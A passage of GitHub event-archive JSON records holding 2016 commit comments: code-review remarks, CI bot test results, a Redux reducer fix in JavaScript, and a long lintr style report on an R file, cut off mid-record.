{"id":"4587793262","type":"CommitCommentEvent","actor":{"login":"iwaseyusuke"},"repo":{"name":"osrg/ryu"},"payload":{"comment":{"id":19091424,"position":null,"line":null,"path":null,"commit_id":"425638d759b089d09cb12d818805edd61f70d1c9","created_at":"2016-09-20T06:50:04Z","updated_at":"2016-09-20T06:50:04Z","body":"ありがとうございます。修正します。"}},"created_at":"2016-09-20T06:50:04Z"}
{"id":"4587794700","type":"CommitCommentEvent","actor":{"login":"popravich"},"repo":{"name":"anti-social/vagga"},"payload":{"comment":{"id":19091425,"position":42,"line":525,"path":"docs/build_steps.rst","commit_id":"230eb8b9f06dbd3544c2b937f7a9600f452e1113","created_at":"2016-09-20T06:50:27Z","updated_at":"2016-09-20T06:50:27Z","body":"typo: \"All options **are**\""}},"created_at":"2016-09-20T06:50:27Z"}
{"id":"4587795259","type":"CommitCommentEvent","actor":{"login":"iwaseyusuke"},"repo":{"name":"osrg/ryu"},"payload":{"comment":{"id":19091427,"position":1,"line":1,"path":"ryu/app/rest_vtep.py","commit_id":"fd389b2a52d245cd02426e39608ef0b73b879fd0","created_at":"2016-09-20T06:50:35Z","updated_at":"2016-09-20T06:50:35Z","body":"あー本当ですね。\r\nありがとうございます。修正します。"}},"created_at":"2016-09-20T06:50:35Z"}
{"id":"4587799248","type":"CommitCommentEvent","actor":{"login":"KrisBoonefaes"},"repo":{"name":"icapps/ios-faro"},"payload":{"comment":{"id":19091431,"position":10,"line":25,"path":"Example/Tests/ParseableSpec.swift","commit_id":"1475f99601874b73959e7f4836e2af03ed7254a0","created_at":"2016-09-20T06:51:42Z","updated_at":"2016-09-20T06:51:42Z","body":"🎈Not sure if using the word \"function\" inside a function name is a good practice. We already know it's a function."}},"created_at":"2016-09-20T06:51:42Z"}
{"id":"4587800209","type":"CommitCommentEvent","actor":{"login":"Huevos"},"repo":{"name":"OpenViX/enigma2"},"payload":{"comment":{"id":19091434,"position":null,"line":null,"path":null,"commit_id":"988379ee1df1e88c6e74236cd79749abbb7489f9","created_at":"2016-09-20T06:51:58Z","updated_at":"2016-09-20T06:51:58Z","body":"This is not a fix. This is badly coded. The skin doesn't need changing. This broken commit needs fixing. Who wrote this? You need to find where the broken value is coming from. Please fix properly. "}},"created_at":"2016-09-20T06:51:58Z"}
{"id":"4587800400","type":"CommitCommentEvent","actor":{"login":"sokra"},"repo":{"name":"webpack/webpack"},"payload":{"comment":{"id":19091435,"position":null,"line":null,"path":null,"commit_id":"40a67f632ce17746fa8646a10fa6e06e54eea538","created_at":"2016-09-20T06:52:01Z","updated_at":"2016-09-20T06:52:01Z","body":"It would be great if we can generate the typescript types from the schema. This way we only need to maintain one list of options."}},"created_at":"2016-09-20T06:52:01Z"}
{"id":"4587802126","type":"CommitCommentEvent","actor":{"login":"yesyu"},"repo":{"name":"goagent/goagent"},"payload":{"comment":{"id":19091438,"position":null,"line":null,"path":null,"commit_id":"e492ed0283f5cde7cf71d7ac47429f64aa48cd13","created_at":"2016-09-20T06:52:30Z","updated_at":"2016-09-20T06:52:30Z","body":"THX"}},"created_at":"2016-09-20T06:52:30Z"}
{"id":"4587802719","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":19091440,"position":null,"line":null,"path":null,"commit_id":"7c6c476e9666f2a67b4b0c88af2f5a8dace437d0","created_at":"2016-09-20T06:52:40Z","updated_at":"2016-09-20T06:52:40Z","body":"@snicolet Hi, I have a question about this interesting try:\r\n-why is the condition on type_of(piece_on(from)) != PAWN needed?\r\n\r\n\r\n"}},"created_at":"2016-09-20T06:52:40Z"}
{"id":"4587804476","type":"CommitCommentEvent","actor":{"login":"henrik"},"repo":{"name":"barsoom/review"},"payload":{"comment":{"id":19091442,"position":null,"line":null,"path":null,"commit_id":"b5f98257ce59e5a24d9c951493a68ebd57ffbddf","created_at":"2016-09-20T06:53:11Z","updated_at":"2016-09-20T06:53:11Z","body":"Ah, cool, didn't notice that. Another tricky thing is what \"reconnect\" means exactly. When I experimented with that and Pusher and/or some JS detection library, it didn't seem spot on.\r\n\r\nNot that the current Remit behaviour is very good in this respect :)"}},"created_at":"2016-09-20T06:53:11Z"}
{"id":"4587804507","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19091443,"position":null,"line":null,"path":null,"commit_id":"fa4d61cdd0a6ab31952d733460fe924e79891157","created_at":"2016-09-20T06:53:11Z","updated_at":"2016-09-20T06:53:11Z","body":"develop (mjwitte) - i386-Windows-7-VisualStudio-12: OK (1766 of 1766 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fa4d61cdd0a6ab31952d733460fe924e79891157-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fa4d61cdd0a6ab31952d733460fe924e79891157-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-20T06:53:11Z"}
{"id":"4587804742","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19091445,"position":null,"line":null,"path":null,"commit_id":"056b267146b2368e483ebbe2caadd52fff6c1aa5","created_at":"2016-09-20T06:53:14Z","updated_at":"2016-09-20T06:53:14Z","body":"develop (macumber) - x86_64-Linux-Ubuntu-14.04-clang-3.5: OK (2359 of 2448 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-056b267146b2368e483ebbe2caadd52fff6c1aa5-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-056b267146b2368e483ebbe2caadd52fff6c1aa5-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-96.36%25-yellow.svg)</a> \n"}},"created_at":"2016-09-20T06:53:14Z"}
{"id":"4587805435","type":"CommitCommentEvent","actor":{"login":"KrisBoonefaes"},"repo":{"name":"icapps/ios-faro"},"payload":{"comment":{"id":19091447,"position":62,"line":84,"path":"README.md","commit_id":"1475f99601874b73959e7f4836e2af03ed7254a0","created_at":"2016-09-20T06:53:27Z","updated_at":"2016-09-20T06:53:27Z","body":"🎈Same here: why name a function \"function\"?"}},"created_at":"2016-09-20T06:53:27Z"}
{"id":"4587806887","type":"CommitCommentEvent","actor":{"login":"agims7"},"repo":{"name":"agims7/test"},"payload":{"comment":{"id":19091451,"position":4,"line":28,"path":"Gruntfile.js","commit_id":"c1052df881a6e4792327508673ac11016c00dac6","created_at":"2016-09-20T06:53:55Z","updated_at":"2016-09-20T06:53:55Z","body":"fixed"}},"created_at":"2016-09-20T06:53:55Z"}
{"id":"4587807132","type":"CommitCommentEvent","actor":{"login":"justingreenberg"},"repo":{"name":"davezuko/react-redux-starter-kit"},"payload":{"comment":{"id":19091452,"position":7,"line":7,"path":"src/store/reducers.js","commit_id":"4ecc655ae7c5db83e6c3edffd7456a667191bf2e","created_at":"2016-09-20T06:53:57Z","updated_at":"2016-09-20T06:53:57Z","body":"hey @davezuko! hope all is well... just checking out the simplified repo, nice work 👍 \r\n\r\nheads up—this will throw since redux needs at least one valid reducer to build the state tree... there are a couple possible solutions:\r\n\r\n**1. provide an temporary global reducer...**\r\n\r\n```js\r\nexport const initialRoot = {\r\n  init: (state = {}) => state\r\n}\r\nexport const makeRootReducer = (asyncReducers = initialRoot) => {\r\n  return combineReducers({ ...asyncReducers })\r\n}\r\n```\r\n\r\nsince initialRoot is default param, the `init` key will not be registered if `asyncReducers` are passed to factory - so the root closure only runs once during store initialization. simple drop-in fix.\r\n\r\n**2. or maybe a _super basic_ root reducer for `location`...**\r\n\r\n```js\r\nconst locationState = {\r\n  location: null\r\n}\r\n\r\nconst locationReducer = (state = locationState, action) => {\r\n  return action.type === 'LOCATION_CHANGE'\r\n    ? action.location\r\n    : state\r\n}\r\n\r\nexport const makeRootReducer = (asyncReducers = {}) => {\r\n  return combineReducers({\r\n    location: locationReducer,\r\n    ...asyncReducers\r\n  })\r\n}\r\n```\r\n\r\nthe `LOCATION_CHANGE` updates could be dispatched directly from main.js, using module.hot handler to unsubscribe, but using `AppContainer` lifecycle hooks to manage subscription seems more idiomatic...\r\n\r\n```js\r\nclass AppContainer extends Component {\r\n  //...\r\n  componentDidMount () {\r\n    const { history, store } = this.props\r\n\r\n    // Use history to update store with location\r\n    this.unsubscribe = history.listen(location => {\r\n      store.dispatch({\r\n        type: 'LOCATION_CHANGE',\r\n        location\r\n      })\r\n    })\r\n  }\r\n  componentWillUnmount () {\r\n    this.unsubscribe && this.unsubscribe()\r\n  }\r\n  //...\r\n}\r\n```\r\n\r\nthis allows access to `location` on store, but would *not* support changing locations via redux ie. devtools will record history but url bar would remain static during time travel debugging"}},"created_at":"2016-09-20T06:53:57Z"}
{"id":"4587809958","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"thijsjanzen/STEPCAM"},"payload":{"comment":{"id":19091454,"position":null,"line":null,"path":null,"commit_id":"e4b38f5b0fc1d87b26a433b25e15bf7d329e788d","created_at":"2016-09-20T06:54:40Z","updated_at":"2016-09-20T06:54:40Z","body":"[R/ABC_SMC.R:2:1:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/ABC_SMC.R#L2) *style:* **Variable and function names should be all lowercase.**\n```r\n​getRandomVals <- function(max_val)  {\n^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:15:1:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/ABC_SMC.R#L15) *style:* **Variable and function names should be all lowercase.**\n```r\n​getFromPrevious <- function(inds, ws, disps, filts, comps)  {\n^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:22:1:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/ABC_SMC.R#L22) *style:* **Variable and function names should be all lowercase.**\n```r\n​calculateWeight <- function(params, target, sigma,\n^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:37:1:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/ABC_SMC.R#L37) *style:* **Variable and function names should be all lowercase.**\n```r\n​normalizeWeights <- function(x) {\n^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:71:1:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/ABC_SMC.R#L71) *style:* **Variable and function names should be all lowercase.**\n```r\n​calculateDistance <- function(rich, even, div, opt_diff, obs, sd_vals)  {\n^~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:75:40:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/ABC_SMC.R#L75) *style:* **Put spaces around all infix operators.**\n```r\n​  fit_optima <- (opt_diff / sd_vals[4])^2;\n                                      ~^~\n```\n[R/ABC_SMC.R:83:21:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/ABC_SMC.R#L83) *style:* **Variable and function names should be all lowercase.**\n```r\n​ABC_SMC <- function(numParticles, species_fallout, taxa, esppres, n_traits,\n                    ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:85:1:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/ABC_SMC.R#L85) *style:* **lines should not be more than 80 characters.**\n```r\n​                    abundances, frequencies, stopRate, Ord, continue_from_file = TRUE,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:85:46:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/ABC_SMC.R#L85) *style:* **Variable and function names should be all lowercase.**\n```r\n​                    abundances, frequencies, stopRate, Ord, continue_from_file = TRUE,\n                                             ^~~~~~~~\n```\n[R/ABC_SMC.R:88:6:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/ABC_SMC.R#L88) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  for(i in seq_along(sd_vals)) {\n     ^\n```\n[R/ABC_SMC.R:89:7:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/ABC_SMC.R#L89) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    if(sd_vals[[i]] == 0.000) {\n      ^\n```\n[R/ABC_SMC.R:91:1:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/ABC_SMC.R#L91) *style:* **lines should not be more than 80 characters.**\n```r\n​           \"one of the community summary statistics shows no variation in your dataset\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:97:18:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/ABC_SMC.R#L97) *style:* **Variable and function names should be all lowercase.**\n```r\n​  disp_vals <- 1:numParticles\n                 ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:98:18:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/ABC_SMC.R#L98) *style:* **Variable and function names should be all lowercase.**\n```r\n​  filt_vals <- 1:numParticles\n                 ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:99:18:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/ABC_SMC.R#L99) *style:* **Variable and function names should be all lowercase.**\n```r\n​  comp_vals <- 1:numParticles\n                 ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:101:13:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/ABC_SMC.R#L101) *style:* **Variable and function names should be all lowercase.**\n```r\n​  fits <- 1:numParticles\n            ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:102:17:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/ABC_SMC.R#L102) *style:* **Variable and function names should be all lowercase.**\n```r\n​  rich_vec <- 1:numParticles\n                ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:103:16:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/ABC_SMC.R#L103) *style:* **Variable and function names should be all lowercase.**\n```r\n​  eve_vec <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:104:16:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/ABC_SMC.R#L104) *style:* **Variable and function names should be all lowercase.**\n```r\n​  div_vec <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:105:16:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/ABC_SMC.R#L105) *style:* **Variable and function names should be all lowercase.**\n```r\n​  opt_vec <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:111:21:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/ABC_SMC.R#L111) *style:* **Variable and function names should be all lowercase.**\n```r\n​  weights <- rep(1, numParticles)\n                    ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:112:26:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/ABC_SMC.R#L112) *style:* **Variable and function names should be all lowercase.**\n```r\n​  next_weights <- rep(1, numParticles)\n                         ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:113:16:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/ABC_SMC.R#L113) *style:* **Variable and function names should be all lowercase.**\n```r\n​  indices <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:120:1:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/ABC_SMC.R#L120) *style:* **lines should not be more than 80 characters.**\n```r\n​    cat(\"Found previous output, continuing from that output\\n\"); flush.console();\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:124:7:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/ABC_SMC.R#L124) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    if(d[numParticles,1] == numParticles) {\n      ^\n```\n[R/ABC_SMC.R:124:10:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/ABC_SMC.R#L124) *style:* **Variable and function names should be all lowercase.**\n```r\n​    if(d[numParticles,1] == numParticles) {\n         ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:124:23:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/ABC_SMC.R#L124) *style:* **Commas should always have a space after.**\n```r\n​    if(d[numParticles,1] == numParticles) {\n                      ^\n```\n[R/ABC_SMC.R:124:29:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/ABC_SMC.R#L124) *style:* **Variable and function names should be all lowercase.**\n```r\n​    if(d[numParticles,1] == numParticles) {\n                            ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:145:5:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/ABC_SMC.R#L145) *style:* **Variable and function names should be all lowercase.**\n```r\n​    numberAccepted <- 0\n    ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:146:28:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/ABC_SMC.R#L146) *style:* **Variable and function names should be all lowercase.**\n```r\n​    if (t != 1) weights <- normalizeWeights(weights)\n                           ^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:146:28:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/ABC_SMC.R#L146) *warning:* **no visible global function definition for ‘normalizeWeights’**\n```r\n​    if (t != 1) weights <- normalizeWeights(weights)\n                           ^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:154:12:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/ABC_SMC.R#L154) *style:* **Variable and function names should be all lowercase.**\n```r\n​    while (numberAccepted < numParticles) {\n           ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:154:29:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/ABC_SMC.R#L154) *style:* **Variable and function names should be all lowercase.**\n```r\n​    while (numberAccepted < numParticles) {\n                            ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:158:19:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/ABC_SMC.R#L158) *style:* **Variable and function names should be all lowercase.**\n```r\n​        params <- getRandomVals(species_fallout)\n                  ^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:158:19:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/ABC_SMC.R#L158) *warning:* **no visible global function definition for ‘getRandomVals’**\n```r\n​        params <- getRandomVals(species_fallout)\n                  ^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:160:19:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/ABC_SMC.R#L160) *style:* **Variable and function names should be all lowercase.**\n```r\n​        params <- getFromPrevious(indices, weights,\n                  ^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:162:19:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/ABC_SMC.R#L162) *warning:* **no visible global function definition for ‘perturb’**\n```r\n​        params <- perturb(params, sigma)\n                  ^~~~~~~\n```\n[R/ABC_SMC.R:190:20:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/ABC_SMC.R#L190) *style:* **Variable and function names should be all lowercase.**\n```r\n​      FD_output <- strippedDbFd(Ord, communities[, present_species])\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:190:20:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/ABC_SMC.R#L190) *warning:* **no visible global function definition for ‘strippedDbFd’**\n```r\n​      FD_output <- strippedDbFd(Ord, communities[, present_species])\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:191:1:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/ABC_SMC.R#L191) *style:* **lines should not be more than 80 characters.**\n```r\n​      FRic <- FD_output$FRic # FRic = functional richness (Villeger et al, 2008, Ecology)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:192:1:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/ABC_SMC.R#L192) *style:* **lines should not be more than 80 characters.**\n```r\n​      FEve <- FD_output$FEve # FEve = functional evenness (Villeger et al, 2008, Ecology)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:193:1:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/ABC_SMC.R#L193) *style:* **lines should not be more than 80 characters.**\n```r\n​      FDiv <- FD_output$FDiv # FDiv = functional diversity (Villeger et al, 2008, Ecology)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:198:1:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/ABC_SMC.R#L198) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  } else {\n^\n```\n[R/ABC_SMC.R:199:1:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/ABC_SMC.R#L199) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    d <- read.table(paste(\"particles_t=\", t, \".txt\", sep=\"\",\n^\n```\n[R/ABC_SMC.R:200:1:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/ABC_SMC.R#L200) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                          collapse = NULL), header = F)\n^\n```\n[R/ABC_SMC.R:201:1:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/ABC_SMC.R#L201) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  }\n^\n```\n[R/ABC_SMC.R:202:1:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/ABC_SMC.R#L202) *style:* **lines should not be more than 80 characters.**\n```r\n​      # calculate distance of trait mean simulated community from that of observed\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:205:1:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/ABC_SMC.R#L205) *style:* **lines should not be more than 80 characters.**\n```r\n​      # (inverse) fit of model: euclidian distance of FD and trait mean values of\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:207:14:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/ABC_SMC.R#L207) *style:* **Variable and function names should be all lowercase.**\n```r\n​      fit <- calculateDistance(FRic[[1]], FEve[[1]], FDiv[[1]],\n             ^~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:212:9:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/ABC_SMC.R#L212) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted <- numberAccepted + 1\n        ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:212:27:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/ABC_SMC.R#L212) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted <- numberAccepted + 1\n                          ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:213:19:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/ABC_SMC.R#L213) *style:* **Variable and function names should be all lowercase.**\n```r\n​        next_disp[numberAccepted] <- params[1]\n                  ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:214:19:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/ABC_SMC.R#L214) *style:* **Variable and function names should be all lowercase.**\n```r\n​        next_filt[numberAccepted] <- params[2]\n                  ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:215:19:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/ABC_SMC.R#L215) *style:* **Variable and function names should be all lowercase.**\n```r\n​        next_comp[numberAccepted] <- params[3]\n                  ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:217:14:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/ABC_SMC.R#L217) *style:* **Variable and function names should be all lowercase.**\n```r\n​        fits[numberAccepted] <- fit\n             ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:218:18:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/ABC_SMC.R#L218) *style:* **Variable and function names should be all lowercase.**\n```r\n​        rich_vec[numberAccepted] <- FRic[[1]]\n                 ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:219:17:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/ABC_SMC.R#L219) *style:* **Variable and function names should be all lowercase.**\n```r\n​        eve_vec[numberAccepted] <- FEve[[1]]\n                ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:220:17:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/ABC_SMC.R#L220) *style:* **Variable and function names should be all lowercase.**\n```r\n​        div_vec[numberAccepted] <- FDiv[[1]]\n                ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:221:17:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/ABC_SMC.R#L221) *style:* **Variable and function names should be all lowercase.**\n```r\n​        opt_vec[numberAccepted] <- mean_optimum;\n                ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:224:24:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/ABC_SMC.R#L224) *style:* **Variable and function names should be all lowercase.**\n```r\n​          next_weights[numberAccepted] = 1\n                       ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:224:40:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/ABC_SMC.R#L224) *style:* **Use <-, not =, for assignment.**\n```r\n​          next_weights[numberAccepted] = 1\n                                       ^\n```\n[R/ABC_SMC.R:226:24:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/ABC_SMC.R#L226) *style:* **Variable and function names should be all lowercase.**\n```r\n​          next_weights[numberAccepted] =\n                       